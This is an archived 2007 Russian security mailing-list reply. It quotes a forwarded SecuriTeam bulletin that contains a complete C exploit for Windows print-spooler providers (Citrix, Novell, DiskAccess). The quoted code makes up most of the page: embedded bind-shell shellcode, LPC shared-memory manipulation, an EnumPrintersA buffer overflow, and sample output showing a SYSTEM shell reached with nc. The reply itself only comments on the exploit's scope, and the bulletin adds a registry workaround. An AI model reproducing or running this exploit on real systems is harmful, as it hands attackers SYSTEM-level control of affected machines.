ПРОЕКТЫ 


  АРХИВ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  СТАТЬИ 


  ПЕРСОНАЛЬНОЕ 


  ПРОГРАММЫ 



ПИШИТЕ
ПИСЬМА














     АРХИВ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [security-alerts] FW: [EXPL] Universal Exploit for Vulnerable Printer Providers (Spooler Service)



Dear Kazennov, Vladimir,

Это  для  поставщиков  печати,  отличных  от  микрософтовского  (Citrix,
Novell,  разные  не-микрософтовские  LPRы  и  т.п.).  И удаленной ошибку
назвать сложно. В общем к безопасности электронной почты точно отношения
не имеет :)

--Tuesday, January 30, 2007, 1:23:30 PM, you wrote to 
security-alerts@xxxxxxxxxxxxxx:

>> -----Original Message-----
>> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx] 
>> Sent: Monday, January 29, 2007 8:17 PM
>> To: html-list@xxxxxxxxxxxxxx
>> Subject: [EXPL] Universal Exploit for Vulnerable Printer 
>> Providers (Spooler Service)
>> 
>> 
>> 
>> Universal Exploit for Vulnerable Printer Providers (Spooler Service) 
>> 
>> 
>> 
>> A vulnerability in the way Printer Providers work allow local 
>> attackers to cause the to crash and potentially execute 
>> arbitrary code. The following exploit code can be used to 
>> test your system. 
>> 
>> 
>> Exploit: 
>> /********************Private exploit- internal use 
>> only***************** 
>>  Title: Universal exploit for vulnerable printer providers 
>> (spooler service). 
>>  Vulnerability: Insecure EnumPrintersW() calls 
>>  Author: Andres Tarasco Acu a - atarasco@xxxxxx 
>>  Website: http://www.514.es 
>>   
>> 
>>  This code should allow to gain SYSTEM privileges with the 
>> following software: 
>>  blink !blink! blink! 
>> 
>>  - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & 
>> NOTFIXED -0day!!! 
>>  - Citrix Metaframe - cpprov.dll - FIXED 
>>  - Novell (nwspool.dll - CVE-2006-5854 - untested) 
>>  - More undisclosed stuff =) 
>> 
>>   If this code crashes your spooler service (spoolsv.exe) check your 
>>   "vulnerable" printer providers at: 
>>  
>> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers 
>> 
>>   Workaround: Trust only default printer providers "Internet 
>> Print Provider" 
>>   and "LanMan Print Services" and delete the other ones. 
>>   
>>   And remember, if it doesnt work for you, tweak it yourself. 
>> Do not ask 
>> 
>> 
>>   D:\Programaci n\EnumPrinters\Exploits>testlpc.exe 
>>  [+] Citrix Presentation Server - EnumPrinterW() Universal exploit 
>>  [+] Exploit coded by Andres Tarasco - atarasco@xxxxxx 
>>   
>> 
>>  [+] Connecting to spooler LCP port \RPC Control\spoolss 
>>  [+] Trying to locate valid address (1 tries) 
>>  [+] Mapped memory. Client address: 0x003d0000 
>>  [+] Mapped memory. Server address: 0x00a70000 
>>  [+] Targeting return address to : 0x00A700A7 
>>  [+] Writting to shared memory... 
>>  [+] Written 0x1000 bytes 
>>  [+] Exploiting vulnerability.... 
>>  [+] Exploit complete. Now Connect to 127.0.0.1:51477 
>>   
>> 
>>  D:\Programaci n\EnumPrinters>nc localhost 51477 
>>  Microsoft Windows XP [Versi n 5.1.2600] 
>>  (C) Copyright 1985-2001 Microsoft Corp. 
>> 
>>  C:\WINDOWS\system32>whoami 
>>  NT AUTHORITY\SYSTEM 
>> 
>> 
>>   514 ownz u 
>>  ********************Private exploit- internal use 
>> only*****************/ 
>> #include <stdio.h> 
>> #include <windows.h> 
>> #include <Winspool.h> 
>> #pragma comment(lib,"Winspool.lib") 
>> 
>> 
>> #define REQUIRED_SIZE 0x1000 
>> 
>> unsigned char shellcode[] = 
>> /*Just a metasploit shellcode - Bindshell 51477 */ 
>> "\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe6" 
>> "\xc0\xc6\x10\x83\xeb\xfc\xe2\xf4\x1a\xaa\x2d\x5d\x0e\x39\x39\xef" 
>> "\x19\xa0\x4d\x7c\xc2\xe4\x4d\x55\xda\x4b\xba\x15\x9e\xc1\x29\x9b" 
>> "\xa9\xd8\x4d\x4f\xc6\xc1\x2d\x59\x6d\xf4\x4d\x11\x08\xf1\x06\x89" 
>> "\x4a\x44\x06\x64\xe1\x01\x0c\x1d\xe7\x02\x2d\xe4\xdd\x94\xe2\x38" 
>> "\x93\x25\x4d\x4f\xc2\xc1\x2d\x76\x6d\xcc\x8d\x9b\xb9\xdc\xc7\xfb" 
>> "\xe5\xec\x4d\x99\x8a\xe4\xda\x71\x25\xf1\x1d\x74\x6d\x83\xf6\x9b" 
>> "\xa6\xcc\x4d\x60\xfa\x6d\x4d\x50\xee\x9e\xae\x9e\xa8\xce\x2a\x40" 
>> "\x19\x16\xa0\x43\x80\xa8\xf5\x22\x8e\xb7\xb5\x22\xb9\x94\x39\xc0" 
>> "\x8e\x0b\x2b\xec\xdd\x90\x39\xc6\xb9\x49\x23\x76\x67\x2d\xce\x12" 
>> "\xb3\xaa\xc4\xef\x36\xa8\x1f\x19\x13\x6d\x91\xef\x30\x93\x95\x43" 
>> "\xb5\x93\x85\x43\xa5\x93\x39\xc0\x80\xa8\x0f\x05\x80\x93\x4f\xf1" 
>> "\x73\xa8\x62\x0a\x96\x07\x91\xef\x30\xaa\xd6\x41\xb3\x3f\x16\x78" 
>> "\x42\x6d\xe8\xf9\xb1\x3f\x10\x43\xb3\x3f\x16\x78\x03\x89\x40\x59" 
>> "\xb1\x3f\x10\x40\xb2\x94\x93\xef\x36\x53\xae\xf7\x9f\x06\xbf\x47" 
>> "\x19\x16\x93\xef\x36\xa6\xac\x74\x80\xa8\xa5\x7d\x6f\x25\xac\x40" 
>> "\xbf\xe9\x0a\x99\x01\xaa\x82\x99\x04\xf1\x06\xe3\x4c\x3e\x84\x3d" 
>> "\x18\x82\xea\x83\x6b\xba\xfe\xbb\x4d\x6b\xae\x62\x18\x73\xd0\xef" 
>> "\x93\x84\x39\xc6\xbd\x97\x94\x41\xb7\x91\xac\x11\xb7\x91\x93\x41" 
>> "\x19\x10\xae\xbd\x3f\xc5\x08\x43\x19\x16\xac\xef\x19\xf7\x39\xc0" 
>> "\x6d\x97\x3a\x93\x22\xa4\x39\xc6\xb4\x3f\x16\x78\x16\x4a\xc2\x4f" 
>> "\xb5\x3f\x10\xef\x36\xc0\xc6\x10"; 
>> 
>> typedef struct _UNICODE_STRING { 
>>   USHORT Length; 
>>   USHORT MaximumLength; 
>>   PWSTR Buffer; 
>> } UNICODE_STRING; 
>> 
>> 
>> typedef struct LpcSectionMapInfo{ 
>>         DWORD Length; 
>>         DWORD SectionSize; 
>>         DWORD ServerBaseAddress; 
>> } LPCSECTIONMAPINFO; 
>> 
>> 
>> typedef struct LpcSectionInfo { 
>>         DWORD Length; 
>>         HANDLE SectionHandle; 
>>         DWORD Param1; 
>>         DWORD SectionSize; 
>>         DWORD ClientBaseAddress; 
>>         DWORD ServerBaseAddress; 
>> } LPCSECTIONINFO; 
>> 
>> 
>> #define SHARED_SECTION_SIZE 0x1000 
>> 
>> typedef struct _OBJDIR_INFORMATION { 
>>   UNICODE_STRING ObjectName; 
>>   UNICODE_STRING ObjectTypeName; 
>>   BYTE Data[1]; 
>> } OBJDIR_INFORMATION; 
>> 
>> typedef struct _OBJECT_ATTRIBUTES { 
>>     ULONG Length; 
>>     HANDLE RootDirectory; 
>>     UNICODE_STRING *ObjectName; 
>>     ULONG Attributes; 
>>     PVOID SecurityDescriptor; 
>>     PVOID SecurityQualityOfService; 
>> } OBJECT_ATTRIBUTES; 
>> 
>> #define InitializeObjectAttributes( p, n, a, r, s ) { \ 
>>     (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 
>>     (p)->RootDirectory = r; \ 
>>     (p)->Attributes = a; \ 
>>     (p)->ObjectName = n; \ 
>>     (p)->SecurityDescriptor = s; \ 
>>     (p)->SecurityQualityOfService = NULL; \ 
>>     } 
>> 
>> 
>> typedef DWORD (WINAPI *NTCREATESECTION)( 
>>    HANDLE* SectionHandle, 
>>    unsigned long DesiredAccess, 
>>    OBJECT_ATTRIBUTES *ObjectAttributes, 
>>    PLARGE_INTEGER MaximumSize, 
>>    unsigned long PageAttributess, 
>>    unsigned long SectionAttributes, 
>>    HANDLE FileHandle); 
>> 
>> typedef DWORD (WINAPI *NTCONNECTPORT)( 
>>    HANDLE *ClientPortHandle, 
>>    UNICODE_STRING *ServerPortName, 
>>    SECURITY_QUALITY_OF_SERVICE *SecurityQos, 
>>    DWORD *ClientSharedMemory, 
>>    DWORD *ServerSharedMemory, 
>>    DWORD *MaximumMessageLength, 
>>    DWORD *ConnectionInfo OPTIONAL, 
>>    DWORD *ConnectionInfoLength); 
>> 
>> 
>> LARGE_INTEGER ConnectToLPCPort(void){ 
>>    /* Thanks goes to Cesar Cerrudo for the WLSI paper */ 
>>  HANDLE hPort; 
>>  LPCSECTIONINFO sectionInfo; 
>>  LPCSECTIONMAPINFO mapInfo; 
>>  byte ConnectDataBuffer[100]; 
>>  DWORD Size = sizeof(ConnectDataBuffer); 
>>    WCHAR * uString=L"\\RPC Control\\spoolss"; 
>>  DWORD i; 
>>  UNICODE_STRING uStr; 
>>    LARGE_INTEGER ret; 
>>     
>> 
>>    NTCONNECTPORT NtConnectPort; 
>>    NTCREATESECTION NtCreateSection; 
>> 
>>    ret.QuadPart=0; 
>>  for (i=0;i<100;i++) 
>>   ConnectDataBuffer[i]=0x0; 
>> 
>> 
>>    NtConnectPort= 
>> (NTCONNECTPORT)GetProcAddress(GetModuleHandle("NTDLL.DLL"), 
>> "NtConnectPort"); 
>>    NtCreateSection= 
>> (NTCREATESECTION)GetProcAddress(GetModuleHandle("NTDLL.DLL"), 
>> "NtCreateSection"); 
>> 
>>    if ( (!NtConnectPort) || (!NtCreateSection) ) { 
>>       printf("[-] Error Loading functions\n"); 
>>    } else { 
>>     HANDLE hSection; 
>>     LARGE_INTEGER SecSize; 
>>     DWORD maxSize=0; 
>>     SECURITY_QUALITY_OF_SERVICE qos; 
>>       DWORD qosSize=4; 
>> 
>>       //create shared section 
>>       SecSize.LowPart=REQUIRED_SIZE;//0x1000; 
>>     SecSize.HighPart=0x0; 
>> 
>>     qos.Length =(DWORD)&qosSize; 
>>     qos.ImpersonationLevel =SecurityIdentification; 
>>     qos.ContextTrackingMode =0x01000101; 
>>     qos.EffectiveOnly =0x10000; 
>>      
>>     
>> NtCreateSection(&hSection,SECTION_ALL_ACCESS,NULL,&SecSize,PAG
>> E_READWRITE,SEC_COMMIT ,NULL); 
>>        
>>       //connect to lpc 
>>     memset(&sectionInfo, 0, sizeof(sectionInfo)); 
>>     memset(&mapInfo, 0, sizeof(mapInfo)); 
>> 
>>     sectionInfo.Length = 0x18; 
>>     sectionInfo.SectionHandle =hSection; 
>>     sectionInfo.SectionSize = SHARED_SECTION_SIZE; 
>>     mapInfo.Length = 0x0C; 
>> 
>>     uStr.Length = wcslen(uString)*2; 
>>     uStr.MaximumLength = wcslen(uString)*2+2; 
>>     uStr.Buffer =uString; 
>>   
>>     //connect to LPC port 
>>     if (!NtConnectPort(&hPort,&uStr,&qos,(DWORD 
>> *)&sectionInfo,(DWORD 
>> *)&mapInfo,&maxSize,(DWORD*)ConnectDataBuffer,&Size)){ 
>>          ret.LowPart=sectionInfo.ClientBaseAddress ; 
>>          ret.HighPart=sectionInfo.ServerBaseAddress; 
>>       } 
>> 
>> 
>>    } 
>>  return(ret); 
>> } 
>> 
>> #define BOFSIZE 300 //Change it if size needed more to 
>> exploit you printer provider 
>>   
>> int main(int argc, char* argv[]) 
>> { 
>>    
>>   unsigned char exploit[BOFSIZE]; 
>>   unsigned char buffer[REQUIRED_SIZE]; 
>>   DWORD dwSizeNeeded,n=0; 
>>   DWORD datalen=REQUIRED_SIZE; 
>>   LARGE_INTEGER dirs; 
>>   HANDLE hProcess; 
>>   DWORD write; 
>>   char *p,i; 
>>   #define lpLocalAddress dirs.LowPart 
>>   #define lpTargetAddress dirs.HighPart 
>> 
>>   printf("[+] Universal exploit for printer spooler providers\n"); 
>>   printf("[+] Some Citrix metaframe, DiskAccess and Novel 
>> versions are affected\n"); 
>>   printf("[+] Exploit by Andres Tarasco - atarasco@xxxxxx\n\n"); 
>> 
>>   printf("[+] Connecting to spooler LCP port \\RPC 
>> Control\\spoolss\n"); 
>>   printf("[+] Trying to locate valid address"); 
>> 
>>   
>>   do { 
>>    dirs=ConnectToLPCPort(); 
>>    if (lpLocalAddress==0){ 
>>   printf("[-] Unable to connect to spooler LPC port\n"); 
>>     printf("[-] Check if the service is running\n"); 
>>   exit(0); 
>>    } 
>>    i=lpTargetAddress>>24; // & 0xFF000000 == 0 
>>    n++; 
>>    if (n==100) { 
>>       printf("\n[-] Unable to locate a valid address after %i 
>> tries\n",n); 
>>       printf("[?] Maybe a greater REQUIRED_SIZE should help. 
>> Try increasing it\n"); 
>>       return(0); 
>>    } 
>>   }while (i!=0); 
>>    
>>   printf(" (%i tries)\n",n); 
>> 
>>   printf("[+] Mapped memory. Client address: 
>> 0x%8.8x\n",lpLocalAddress); 
>>   printf("[+] Mapped memory. Server address: 
>> 0x%8.8x\n",lpTargetAddress); 
>> 
>>   
>>   i=(lpTargetAddress<<8)>>24; 
>>   //Fill all with rets. who cares where is it. 
>>   memset(exploit,i,sizeof(exploit)); 
>>   exploit[sizeof(exploit)-1]='\0'; 
>> 
>>   /* 
>>   memset(exploit,'A',sizeof(exploit)-1); 
>>   exploit[262]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess 
>>   exploit[263]= (lpTargetAddress<<8)>>24; //EIP for Diskaccess 
>>   exploit[264]='\0'; 
>>   */ 
>>    
>>   printf("[+] Targeting return address to : 
>> 0x00%2.2X00%2.2X\n",exploit[262],exploit[262]); 
>> 
>>   p=(char *)lpLocalAddress; 
>> 
>>   memset(&buffer[0],0x90,sizeof(buffer)-1); 
>>   
>> memcpy(&buffer[sizeof(buffer)-sizeof(shellcode)-10],shellcode,
>> sizeof(shellcode)); 
>>    
>>   printf("[+] Writting to shared memory...\n"); 
>>   if ( (hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, 
>> GetCurrentProcessId()))!= NULL ) 
>>   { 
>>     if ( WriteProcessMemory( hProcess, p, &buffer[0], 
>> REQUIRED_SIZE, &write )!=0 ) 
>>     { 
>>       printf("[+] Written 0x%x bytes \n",write); 
>>       printf("[+] Exploiting vulnerability....\n"); 
>>       printf("[+] Exploit complete. Now try to connect to 
>> 127.0.0.1:51477\n"); 
>>       printf("[+] and check if you are system =)\n"); 
>>       EnumPrintersA ( PRINTER_ENUM_NAME, (char *)exploit, 1, 
>> NULL, 0, &dwSizeNeeded, &n ); 
>>       return(1); 
>>     } 
>>   } 
>>   printf("[+] Something failed. Good luck next time\n"); 
>>   return(0); 
>> } 
>> 
>> // milw0rm.com [2007-01-29] 
>> 
>> 
>> Additional Information: 
>> The information has been provided by Andres Tarasco Acuca 
>> <mailto:atarasco@xxxxxx> . 
>> The original article can be found at: http://www.514.es 
>> 
>> 
>> ==============================================================
>> ================== 
>> 
>> 
>> 
>> 
>> 
>> This bulletin is sent to members of the SecuriTeam mailing list. 
>> To unsubscribe from the list, send mail with an empty subject 
>> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx 
>> In order to subscribe to the mailing list and receive 
>> advisories in HTML format, simply forward this email to: 
>> html-list-subscribe@xxxxxxxxxxxxxx 
>> 
>> 
>> 
>> ==============================================================
>> ================== 
>> ==============================================================
>> ================== 
>> 
>> DISCLAIMER: 
>> The information in this bulletin is provided "AS IS" without 
>> warranty of any kind. 
>> In no event shall we be liable for any damages whatsoever 
>> including direct, indirect, incidental, consequential, loss 
>> of business profits or special damages. 
>> 
>> 
>> 
>> 
>> 
>> 



-- 
~/ZARAZA
Неприятности начнутся в восемь.  (Твен)




 




Copyright © Lexa Software, 1996-2009.